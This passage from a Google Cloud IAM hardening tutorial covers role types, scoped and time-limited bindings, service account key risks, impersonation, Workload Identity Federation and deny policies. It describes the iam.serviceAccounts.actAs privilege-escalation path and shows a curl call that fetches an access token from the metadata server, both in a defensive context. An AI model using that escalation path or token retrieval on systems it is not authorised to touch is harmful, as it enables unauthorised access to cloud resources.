  | jq '.bindings[] | select(.members[] | contains("allUsers") or contains("allAuthenticatedUsers"))'

# Check all GCS buckets in a project for public access
gsutil iam get gs://BUCKET_NAME \
  | grep -E "(allUsers|allAuthenticatedUsers)"

Role Types — Choose the Right Granularity

Basic (Primitive) Roles — Don’t Use in Production

roles/viewer   → read access to most resources across the entire project
roles/editor   → read + write to most resources
roles/owner    → full access including IAM management

These are legacy roles from before GCP had service-specific roles. roles/editor is particularly dangerous because it grants write access across almost every GCP service in the project. Use it in production and you have no meaningful separation of duties between your services.

I’ve seen roles/editor granted to a data pipeline service account because “it needed access to BigQuery, Cloud Storage, and Pub/Sub.” All three of those have predefined roles. Three specific bindings. Instead: one broad role that also grants access to Cloud SQL, Kubernetes, Secret Manager, and Compute Engine — none of which the pipeline needed.

Predefined Roles — The Default Correct Choice

Service-specific roles managed and updated by Google. For most use cases, these are the right choice:

# Find predefined roles for Cloud Storage
gcloud iam roles list --filter="name:roles/storage" --format="table(name,title)"
# roles/storage.objectViewer   — read objects (not list buckets)
# roles/storage.objectCreator  — create objects, cannot read or delete
# roles/storage.objectAdmin    — full object control
# roles/storage.admin          — full bucket + object control (much broader)

# See exactly what permissions a predefined role includes
gcloud iam roles describe roles/storage.objectViewer

The distinction between roles/storage.objectViewer and roles/storage.admin is the difference between “can read objects” and “can read objects, create objects, delete objects, and modify bucket IAM policies.” Use the narrowest role that covers the actual need.

Custom Roles — When Predefined Is Still Too Broad

When you need finer control than any predefined role offers, create a custom role:

cat > custom-log-reader.yaml << 'EOF'
title: "Log Reader"
description: "Read application logs from Cloud Logging — nothing else"
stage: "GA"
includedPermissions:
  - logging.logEntries.list
  - logging.logs.list
  - logging.logMetrics.get
  - logging.logMetrics.list
EOF

# Create at project level (available within one project)
gcloud iam roles create LogReader \
  --project=my-project \
  --file=custom-log-reader.yaml

# Or at org level (reusable across projects in the org)
gcloud iam roles create LogReader \
  --organization=ORG_ID \
  --file=custom-log-reader.yaml

# Grant the custom role
gcloud projects add-iam-policy-binding my-project \
  --member="serviceAccount:[email protected]" \
  --role="projects/my-project/roles/LogReader"

Custom roles have an operational overhead: when Google adds new permissions to a service, predefined roles are updated automatically. Custom roles are not — you have to update them manually. For roles like “Log Reader” that are unlikely to need new permissions, this isn’t a concern. For roles like “App Admin” that span many services, it becomes a maintenance burden.


IAM Policy Bindings — How Access Is Actually Granted

The mechanism for granting access in GCP is adding a binding to a resource’s IAM policy. A binding is: member + role + (optional condition).

# Grant a role on a project (all resources in the project inherit this)
gcloud projects add-iam-policy-binding my-project \
  --member="user:[email protected]" \
  --role="roles/storage.objectViewer"

# Grant on a specific GCS bucket (narrower — only this bucket)
gcloud storage buckets add-iam-policy-binding gs://prod-assets \
  --member="serviceAccount:[email protected]" \
  --role="roles/storage.objectViewer"

# Grant on a specific BigQuery dataset
bq update --add_iam_policy_binding \
  --member="group:[email protected]" \
  --role="roles/bigquery.dataViewer" \
  my-project:analytics_dataset

# View the current IAM policy on a project
gcloud projects get-iam-policy my-project --format=json

# View a specific resource's policy
gcloud storage buckets get-iam-policy gs://prod-assets

The choice between project-level and resource-level binding has real consequences. A binding on the GCS bucket affects only that bucket. A binding at the project level affects the bucket AND every other resource in the project. In practice, default to the most specific scope available. Only move up the hierarchy when the alternative is an unmanageable number of bindings.

Conditional Bindings — Time-Limited and Context-Scoped Access

Conditions scope when a binding applies. They use CEL (Common Expression Language):

# Temporary access for a contractor — automatically expires
gcloud projects add-iam-policy-binding my-project \
  --member="user:[email protected]" \
  --role="roles/storage.objectViewer" \
  --condition="expression=request.time < timestamp('2026-06-30T00:00:00Z'),title=Contractor access Q2 2026"

# Access only from corporate network
gcloud projects add-iam-policy-binding my-project \
  --member="user:[email protected]" \
  --role="roles/bigquery.admin" \
  --condition="expression=request.origin.ip.startsWith('10.0.'),title=Corp network only"

Temporary access that automatically expires is one of the most practical applications of conditional bindings. Instead of “I’ll grant access and remember to remove it,” you set an expiry and it removes itself. The cognitive overhead of tracking temporary grants doesn’t disappear — you still need to know the grant exists — but the risk of it outliving its purpose drops significantly.


Service Accounts — GCP’s Machine Identity

Service accounts are the machine identity in GCP. They should be used for every workload that needs to call GCP APIs — GCE instances, GKE pods, Cloud Functions, Cloud Run services.

# Create a service account
gcloud iam service-accounts create app-backend \
  --display-name="App Backend Service Account" \
  --project=my-project

SA_EMAIL="[email protected]"

# Grant it the specific role it needs — on the specific resource it needs
gcloud storage buckets add-iam-policy-binding gs://app-assets \
  --member="serviceAccount:${SA_EMAIL}" \
  --role="roles/storage.objectViewer"

# Attach to a GCE instance
gcloud compute instances create my-vm \
  --service-account="${SA_EMAIL}" \
  --scopes="cloud-platform" \
  --zone=us-central1-a

From inside the VM, Application Default Credentials (ADC) handles authentication automatically:

# From the VM — ADC uses the attached SA without any credential configuration
gcloud auth application-default print-access-token

# Or via the metadata server directly
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"

Service Account Keys — The Antipattern to Avoid

A service account key is a JSON file containing a private key. It’s long-lived, it doesn’t expire automatically, and if it leaks it gives an attacker persistent access as that service account until someone discovers and revokes it.

# Creating a key — only if there is genuinely no alternative
gcloud iam service-accounts keys create key.json --iam-account="${SA_EMAIL}"
# This generates a long-lived credential. It will exist until explicitly deleted.

# List all active keys — do this in every audit
gcloud iam service-accounts keys list --iam-account="${SA_EMAIL}"

# Delete a key
gcloud iam service-accounts keys delete KEY_ID --iam-account="${SA_EMAIL}"

In the GCP environment I mentioned earlier — the one with roles/editor at the folder level — I also found 23 service account key files downloaded across the team’s laptops over 18 months. Nobody had a complete list of which keys were still valid and where they were stored. Several were for accounts that no longer existed. That’s not a hypothetical attack surface. It’s a breach waiting for a laptop to be stolen.

Never create service account keys when:
– Code runs on GCE/GKE/Cloud Run/Cloud Functions — use the attached service account and ADC
– Code runs in GitHub Actions — use Workload Identity Federation
– Code runs on-premises with Kubernetes — use Workload Identity Federation with OIDC

Service Account Impersonation — The Right Alternative to Keys

Instead of downloading a key, grant a user or service account permission to impersonate the service account. They generate a short-lived token, not a permanent credential:

# Allow alice to impersonate the service account
gcloud iam service-accounts add-iam-policy-binding "${SA_EMAIL}" \
  --member="user:[email protected]" \
  --role="roles/iam.serviceAccountTokenCreator"

# Alice generates a token for the SA — no key file, short-lived
gcloud auth print-access-token --impersonate-service-account="${SA_EMAIL}"

# Or configure ADC to use impersonation
export GOOGLE_IMPERSONATE_SERVICE_ACCOUNT="${SA_EMAIL}"
gcloud storage ls gs://app-assets  # runs as the SA

This is the right model for humans who need to act as service accounts for debugging or deployment: impersonate, use, done. The token expires. No file to manage.


Workload Identity Federation — Credentials Eliminated

The cleanest solution for any workload running outside GCP that needs to call GCP APIs: Workload Identity Federation. The external workload authenticates with its native identity (a GitHub Actions OIDC JWT, an AWS IAM role, a Kubernetes service account token), exchanges it for a short-lived GCP access token, and never handles a service account key.

# Create a Workload Identity Pool
gcloud iam workload-identity-pools create "github-actions-pool" \
  --project=my-project \
  --location=global \
  --display-name="GitHub Actions WIF Pool"

# Create a provider (GitHub OIDC)
gcloud iam workload-identity-pools providers create-oidc "github-provider" \
  --project=my-project \
  --location=global \
  --workload-identity-pool="github-actions-pool" \
  --issuer-uri="https://token.actions.githubusercontent.com" \
  --attribute-mapping="google.subject=assertion.sub,attribute.repository=assertion.repository" \
  --attribute-condition="assertion.repository_owner == 'my-org'"

# Allow a specific GitHub repo to impersonate the SA
gcloud iam service-accounts add-iam-policy-binding "${SA_EMAIL}" \
  --role="roles/iam.workloadIdentityUser" \
  --member="principalSet://iam.googleapis.com/projects/PROJECT_NUM/locations/global/workloadIdentityPools/github-actions-pool/attribute.repository/my-org/my-repo"

GitHub Actions workflow — no key files, no secrets stored in GitHub:

jobs:
  deploy:
    permissions:
      id-token: write   # required for OIDC token request
      contents: read
    steps:
      - uses: google-github-actions/auth@v2
        with:
          workload_identity_provider: "projects/PROJECT_NUM/locations/global/workloadIdentityPools/github-actions-pool/providers/github-provider"
          service_account: "[email protected]"

      - run: gcloud storage cp dist/ gs://app-assets/ --recursive

The OIDC JWT from GitHub is presented to GCP, which verifies it against GitHub’s public keys, checks the attribute mapping and condition (only the specified repo can use this), and issues a short-lived GCP access token. The credential exists for the duration of the job and is then gone.


IAM Deny Policies — Org-Wide Guardrails

GCP added standalone deny policies separate from bindings. They override grants:

cat > deny-iam-escalation.json << 'EOF'
{
  "displayName": "Deny IAM escalation permissions to non-admins",
  "rules": [{
    "denyRule": {
      "deniedPrincipals": ["principalSet://goog/group/[email protected]"],
      "deniedPermissions": [
        "iam.googleapis.com/roles.create",
        "iam.googleapis.com/roles.update",
        "iam.googleapis.com/serviceAccounts.actAs"
      ]
    }
  }]
}
EOF

gcloud iam policies create deny-iam-escalation-policy \
  --attachment-point="cloudresourcemanager.googleapis.com/projects/my-project" \
  --policy-file=deny-iam-escalation.json

iam.serviceAccounts.actAs is worth calling out specifically. It’s the GCP equivalent of AWS’s iam:PassRole — it allows an identity to make a service act as a specified service account. If a developer can call actAs on a high-privileged service account, they can launch a GCE instance using that service account and then operate with its permissions. Same privilege escalation pattern as iam:PassRole, different name. Deny it for anyone who doesn’t explicitly need it.


⚠ Production Gotchas

roles/editor at folder level is a blast radius waiting to happen
The role sounds like “edit access.” At folder level it means edit access to every service in every project under that folder — including services nobody thought to trace. Always scope to the specific project or resource, never a folder unless the use case explicitly requires it.

allAuthenticatedUsers on a GCS bucket is public to 3 billion accounts
Any Google account — personal Gmail included — qualifies as “authenticated.” I’ve seen production customer data exposed this way while a developer tested a CDN pattern on the wrong bucket. Audit for these bindings before they become a breach notification.

Service account keys accumulate and nobody tracks them
In every GCP environment I’ve audited that allowed SA key creation, there were active keys for accounts that no longer existed, stored on laptops with no central inventory. Keys don’t expire. Audit with gcloud iam service-accounts keys list across every SA in every project.

iam.serviceAccounts.actAs is a privilege escalation path
If a principal can call actAs on a high-privileged SA, they can launch a GCE instance with that SA and operate with its full permissions — without ever being directly granted those permissions. Block this with a deny policy for everyone who doesn’t explicitly need it.

Org-level roles/viewer is not a safe broad grant
Read access to every project config, every service configuration, every infrastructure metadata object across your entire GCP estate is not a benign grant. Treat any binding above the project level as high-blast-radius, regardless of the role.


Quick Reference

# Audit org and folder structure before any high-level change
gcloud organizations list
gcloud resource-manager folders list --organization=ORG_ID
gcloud projects list --filter="parent.id=FOLDER_ID"

# Inspect all bindings at org level
gcloud organizations get-iam-policy ORG_ID --format=json | jq '.bindings[]'

# Find allUsers / allAuthenticatedUsers in a project
gcloud projects get-iam-policy PROJECT_ID --format=json \
  | jq '.bindings[] | select(.members[] | contains("allUsers") or contains("allAuthenticatedUsers"))'

# Check a GCS bucket for public access
gsutil iam get gs://BUCKET_NAME | grep -E "(allUsers|allAuthenticatedUsers)"

# Audit all user-managed SA keys across a project
gcloud iam service-accounts list --project=PROJECT_ID --format="value(email)" \
  | xargs -I{} gcloud iam service-accounts keys list --iam-account={} --managed-by=user

# List predefined roles for a service
gcloud iam roles list --filter="name:roles/storage" --format="table(name,title)"

# Inspect what permissions a role actually includes
gcloud iam roles describe roles/storage.objectViewer

# Grant time-limited access with conditional binding
gcloud projects add-iam-policy-binding PROJECT_ID \
  --member="user:[email protected]" \
  --role="roles/storage.objectViewer" \
  --condition="expression=request.time < timestamp('2026-06-30T00:00:00Z'),title=Contractor Q2 2026"

# Enable SA impersonation (avoids key creation)
gcloud iam service-accounts add-iam-policy-binding SA_EMAIL \
  --member="user:[email protected]" \
  --role="roles/iam.serviceAccountTokenCreator"

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 5 — Identity and Access Management GCP’s hierarchical model and service account patterns are the primary IAM constructs for GCP environments
CISSP Domain 3 — Security Architecture Resource hierarchy design determines access inheritance — architectural decisions with direct security implications
ISO 27001:2022 5.15 Access control GCP IAM bindings are the technical implementation of access control policy in GCP environments
ISO 27001:2022 5.18 Access rights Service account provisioning, conditional bindings with expiry, and workload identity federation
ISO 27001:2022 8.2 Privileged access rights Folder/org-level bindings and basic roles represent the highest-risk privilege grants in GCP
SOC 2 CC6.1 IAM bindings and Workload Identity Federation address machine identity controls for CC6.1
SOC 2 CC6.3 Conditional bindings with time-bound expiry directly satisfy access removal requirements

Key Takeaways

  • GCP IAM is hierarchical — bindings inherit downward; a binding at org or folder level has much larger scope than it appears
  • Basic roles (viewer/editor/owner) are too coarse for production; use predefined or custom roles and grant at the narrowest scope
  • Service account keys are a long-lived credential antipattern; use ADC on GCP infrastructure, impersonation for humans, and Workload Identity Federation for external workloads
  • allAuthenticatedUsers and allUsers bindings expose resources to the internet — audit for these in every environment
  • iam.serviceAccounts.actAs is a privilege escalation vector — treat it like iam:PassRole
  • Conditional bindings with expiry dates are better than “I’ll remember to remove this later”

What’s Next

EP06 covers Azure RBAC and Entra ID — the most directory-centric of the three models, where Active Directory’s 25 years of enterprise history shapes both the strengths and the complexity of Azure’s access control.

Next: Azure RBAC Scopes — Management Groups, Subscriptions, and how role inheritance works across the Microsoft estate.

Get EP06 in your inbox when it publishes → subscribe